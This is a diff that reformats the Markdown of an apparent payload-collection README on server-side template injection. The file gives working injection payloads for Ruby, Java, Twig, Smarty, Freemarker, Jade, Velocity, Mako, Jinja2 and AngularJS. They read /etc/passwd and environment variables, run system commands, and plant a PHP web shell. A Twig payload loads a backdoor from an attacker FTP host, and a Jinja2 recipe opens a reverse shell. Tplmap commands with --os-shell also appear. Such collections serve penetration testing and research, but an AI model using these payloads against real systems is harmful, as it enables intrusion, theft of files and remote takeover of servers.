Markdown formatting update

Server Side Template injections/README.md

@@ -1,29 +1,34 @@
 # Templates Injections
 
-> Template injection allows an attacker to include template code into an existant (or not) template.     
+> Template injection allows an attacker to include template code into an existant (or not) template.
 
 Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
 e.g:
-```
-python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell 
+
+```powershell
+python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
 python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
-python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade 
+python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
 ```
 
 ## Ruby
+
 ### Basic injection
+
 ```python
 <%= 7 * 7 %>
 ```
 
 ### Retrieve /etc/passwd
+
 ```python
 <%= File.open('/etc/passwd').read %>
 ```
 
+## Java
+
+### Java - Basic injection
 
-## Java 
-### Basic injection
 ```java
 ${7*7}
 ${{7*7}}
@@ -32,24 +37,29 @@ ${class.getResource("").getPath()}
 ${class.getResource("../../../../../index.htm").getContent()}
 ```
 
-### Retrieve the system’s environment variables.
+### Java - Retrieve the system’s environment variables
+
 ```java
 ${T(java.lang.System).getenv()}
 ```
 
-### Retrieve /etc/passwd
+### Java - Retrieve /etc/passwd
+
 ```java
 ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
 ```
 
 ## Twig
-### Basic injection
+
+### Twig - Basic injection
+
 ```python
 {{7*7}}
 {{7*'7'}} would result in 49
 ```
 
-### Template format
+### Twig - Template format
+
 ```python
 $output = $twig > render (
   'Dear' . $_GET['custom_greeting'],
@@ -62,28 +72,32 @@ $output = $twig > render (
 );
 ```
 
-### Code execution
+### Twig - Code execution
+
 ```python
 {{self}}
 {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
 ```
 
-
 ## Smarty
+
 ```python
 {php}echo `id`;{/php}
 {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
 ```
 
 ## Freemarker
+
 Default functionality.
+
 ```python
 <#assign
 ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
 ```
 
 ## Jade / Codepen
+
 ```python
 - var x = root.process
 - x = x.mainModule.require
@@ -92,6 +106,7 @@ ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
 ```
 
 ## Velocity
+
 ```python
 #set($str=$class.inspect("java.lang.String").type)
 #set($chr=$class.inspect("java.lang.Character").type)
@@ -104,6 +119,7 @@ $str.valueOf($chr.toChars($out.read()))
 ```
 
 ## Mako
+
 ```python
 <%
 import os
@@ -112,13 +128,13 @@ x=os.popen('id').read()
 ${x}
 ```
 
-
 ## Jinja2
+
 [Official website](http://jinja.pocoo.org/)
 > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
 
+### Jinja 2 - Basic injection
 
-### Basic injection
 ```python
 {{4*4}}[[5*5]]
 {{7*'7'}} would result in 7777777
@@ -126,7 +142,9 @@ ${x}
 
 Jinja2 is used by Python Web Frameworks such as Django or Flask.
 The above injections have been tested on Flask application.
-### Template format
+
+### Jinja2 - Template format
+
 ```python
 {% extends "layout.html" %}
 {% block body %}
@@ -139,12 +157,14 @@ The above injections have been tested on Flask application.
 
 ```
 
-### Dump all used classes
+### Jinja2 - Dump all used classes
+
 ```python
 {{ ''.__class__.__mro__[2].__subclasses__() }}
 ```
 
-### Dump all config variables
+### Jinja2 - Dump all config variables
+
 ```python
 {% for key, value in config.iteritems() %}
     <dt>{{ key|e }}</dt>
@@ -152,23 +172,29 @@ The above injections have been tested on Flask application.
 {% endfor %}
 ```
 
-### Read remote file
+### Jinja2 - Read remote file
+
 ```python
 # ''.__class__.__mro__[2].__subclasses__()[40] = File class
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
 ```
 
-### Write into remote file
+### Jinja2 - Write into remote file
+
 ```python
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
 ```
 
-### Remote Code Execution via reverse shell
+### Jinja2 - Remote Code Execution via reverse shell
+
 Listen for connexion
-```
+
+```bash
 nv -lnvp 8000
 ```
+
 Inject this template
+
 ```python
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config
 {{ config.from_pyfile('/tmp/evilconfig.cfg') }}  # load the evil config
@@ -176,16 +202,19 @@ Inject this template
 ```
 
 ## AngularJS
-### Basic injection
+
+### AngularJS - Basic injection
+
 ```javascript
 $eval('1+1')
 {{1+1}}
 ```
 
 ## Thanks to
- * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
- * [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
- * [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
- * [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
- * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
- * [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
+
+* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
+* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
+* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
+* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
+* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
+* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)